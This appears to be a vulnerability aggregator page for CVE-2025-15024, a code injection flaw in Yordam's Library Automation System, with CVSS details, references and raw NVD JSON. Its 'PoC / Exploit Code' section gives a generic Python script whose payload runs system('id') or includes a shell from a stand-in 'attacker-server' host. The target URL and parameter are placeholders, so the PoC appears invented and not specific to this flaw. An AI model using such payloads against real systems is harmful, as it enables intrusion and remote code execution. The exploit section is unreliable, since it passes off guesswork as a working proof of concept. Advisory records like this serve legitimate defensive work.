CVE-2025-15024

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Remote Code Inclusion. This issue affects Library Automation System: from v.19.5 before v.22.1.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

v19.5

v22.1之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Yordam Library Automation System - Remote Code Injection (CVE-2025-15024)
# Description: Proof of concept for code injection vulnerability.
# Disclaimer: For educational purposes only.

target_url = "http://target-host/vulnerable_endpoint"

# The attacker crafts a payload to inject system commands.
# The exact parameter name depends on the vulnerable component.
payload_data = {
    "vulnerable_parameter": "system('id'); // or include('http://attacker-server/shell.txt')"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, data=payload_data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Server Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15024
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15024
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15024/
[4] VulDB https://vuldb.com/cve/CVE-2025-15024
[5] https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15024", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:35.063", "lastModified": "2026-05-14T18:19:37.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Remote Code Inclusion.\n\nThis issue affects Library Automation System: from v.19.5 before v.22.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240", "source": "[email protected]"}]}}